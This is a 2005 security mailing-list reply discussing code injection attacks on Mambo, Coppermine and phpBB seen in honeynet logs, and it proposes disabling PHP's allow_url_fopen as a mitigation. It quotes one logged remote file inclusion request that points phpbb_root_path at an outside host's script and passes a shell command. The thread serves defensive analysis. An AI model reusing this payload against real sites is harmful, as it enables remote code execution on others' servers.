Re: Mambo, Coppermine and PHPBB Attacks

[Tofik Suleymanov <tofik () oxygen az>]

Paul Laudanski wrote:

> On Mon, 19 Dec 2005, Mark Ryan del Moral Talabis wrote:
>
>  
>
> > Our honeynet has been picking up an increase in the number of code
> > injection attacks in the past few days. Attacks are primarily directed
> > to several popular open source applications: Mambo, Coppermine and
> > PHPBB.
> >
> > Analysis:
> > http://www.philippinehoneynet.org/dataarchive.php?date=2005-12-17
> >    
>
> Nice catch.  I checked my logs and found these which appear to be the 
> valid phpbb injection request:
>
> 81.215.110.24 - - [19/Dec/2005:07:20:30 -0500] "GET 
> /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.frauenfinanzzentrum.at/tool25.dat?&cmd=id HTTP/1.0"
>
> Notice the admin_styles.php is written out once.  I would suspect that 
> disabling allow_url_fopen directive in php.ini would disallow such a 
> request to execute.  This would prevent resources other than files to not 
> be included.  But I haven't tested.
>
>  
From php.ini
"Whether to allow the treatment of URLs (like http:// or ftp://) as files."

In latest versions of php this option is set to secure mode of operation 
by default (as far as i know):
allow_url_fopen = Off
This option prevents such type of attacks.